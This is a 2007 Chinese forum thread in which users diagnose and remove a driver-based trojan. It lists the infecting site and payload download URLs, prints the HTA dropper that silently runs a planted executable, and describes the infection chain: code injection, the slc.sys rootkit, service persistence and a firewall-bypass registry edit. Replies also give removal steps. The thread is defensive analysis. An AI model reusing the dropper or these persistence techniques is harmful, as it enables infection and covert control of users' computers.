首页
社区
课程
招聘
[讨论]类似MY123性质的驱动木马.搞到最后,居然搞不顶.太牛了。
发表于: 2007-1-17 16:03 5038

[讨论]类似MY123性质的驱动木马.搞到最后,居然搞不顶.太牛了。

2007-1-17 16:03
5038
无意中了马.form这个网站
http://www.hk0909.com/
down下
http://ww1.tonji123.com/cjb.hta
http://ww1.tonji123.com/ps.exe
cjb.hta内容是
<html>
<HTA:APPLICATION ID=j3714 CAPTION="no" BORDER="none" HEIGHT="0" SHOWINTASKBAR="no" WIDTH="0">
<body>
<script language=javascript>
var f="c:\\svchost.exe";
try{
   var w2s3h = new ActiveXObject("WScript.Shell")
   w2s3h.Run(f,0,false);
   window.close();
}
catch(e){}
</script>
</body>
</html>

会在system32 生成 q.exe 和mshta.exe 文件

还有一个名为 slc.sys 的驱动 ,隐藏了。找不到.用冰刃可以查到。居然无法删除.手工无语ing...
unlocker都不能运行。无余了。

无余,这个毒太牛了。
我用冰刃,把可疑文件都删除了。
居然还有,SSDT也检测不出来。
无语,
只好把
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
设置成只读.
用user帐号登陆.期待牛人分析。

[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!

上传的附件:
收藏
免费 0
支持
分享
最新回复 (5)
雪    币: 245
活跃值: (41)
能力值: ( LV7,RANK:110 )
在线值:
发帖
回帖
粉丝
2
有个文件伪装成系统文件..郁闷.他驱动都日了.问题还存在.
怪不得,找不半天找不到原因。
DOWN 下来分析的朋友一定要注意.
建议从http://www.hk0909.com/ 主站抓包 下载木马原程序.可能提取不完全。

这个ps.exe 加的upack0.36 的壳.peid 好象查不出来。
slc.sys 是rootkit
2007-1-17 16:41
0
雪    币: 277
活跃值: (312)
能力值: ( LV9,RANK:330 )
在线值:
发帖
回帖
粉丝
3
用启动盘启动起来,删除
2007-1-18 09:04
0
雪    币: 201
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
4
去安全模式.用PowerMV和.Sengr
2007-1-18 09:14
0
雪    币: 126
活跃值: (61)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
5

稍微看了一下,呵呵,很垃圾的恶意程序,没啥特色,容易删除~   简要分析如下:

ps.exe是一个用upack压缩过的下载者,代码注入到explorer.exe下载3个文件到c:\o.exe,c:\p.exe,c:\q.exe并执行。

c:\o.exe 执行后释放%systemroot%\system32\ctfcon.exe、%systemroot%\system32\tsdb.dll、%systemroot%\system32\DriveInterface.dll,%systemroot%\system32\slc.sys,并调用regsvr32.exe注册tsdb.dll,然后加载驱动文件slc.sys,接着删除DriveInterface.dll,接着再创建ctfcon进程。slc.sys挂接了SDT中的NtOpenKey以及NtSetInformationFile。slc.sys只对explorer.exe进程隐藏文件。

c:\p.exe 执行后释放%systemroot%\system32\cmes.exe,并以-Service参数运行cmes.exe,然后p.exe运行记事本并远程线程代码注入实现自删除。cmes.exe执行后将其自身安装名为DCOM Process Service的服务实现自启动,另外还释放%systemroot%\system32\itc.dll(文件设置为隐藏属性,但未使用rootkit技术隐藏) ,cmes.exe还远程线程将itc.dll注入到winlogon.exe进程中。

c:\q.exe 复制自己到系统根目录下,并且修改注册表HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\ 使其绕过XP SP2自带的防火墙,再创建名为
ServiceProvisioning的服务(DisplayName为Transaction Provisioning Service)使%systemroot%\system32\q.exe实现自启动。服务以及进程均没有隐藏。

恶意程序的流程分析完毕。c:\p.exe以及c:\q.exe均未使用rootkit
技术,c:\o.exe释放的slc.sys驱动也是小儿科,删除很容易。

简单说一下整个清理过程:终止进程ctfcon.exe、q.exe,删除那两个服务,执行regsvr32.exe /u C:\WINDOWS\system32\tsdb.dll,删除相关文件以及注册表项。删除itc.dll时可以先用IceSword卸载DLL再删除,不过防止winlogon崩溃,可以先重命名itc.dll重启后再删除(因为COW机制NT核心的平台下可以对正在运行的未以独占方式打开的文件进行重命名),或者使用IceSword 1.20的强制删除文件功能来直接删除文件。不过slc.sys在资源管理器中看不到,不过对于slc.sys还没到动用IceSword 1.20的地步,打开cmd,cd到系统根目录下,依次运行如下指令即可:ren slc.sys 123.sys ; del 123.sys 。 呵呵~
2007-1-18 13:00
0
雪    币: 245
活跃值: (41)
能力值: ( LV7,RANK:110 )
在线值:
发帖
回帖
粉丝
6
谢谢 xyzreg
开始以为ctfcon.exe 是正常进程。所以没找到问题的原因。
2007-1-18 14:30
0
游客
登录 | 注册 方可回帖
返回
//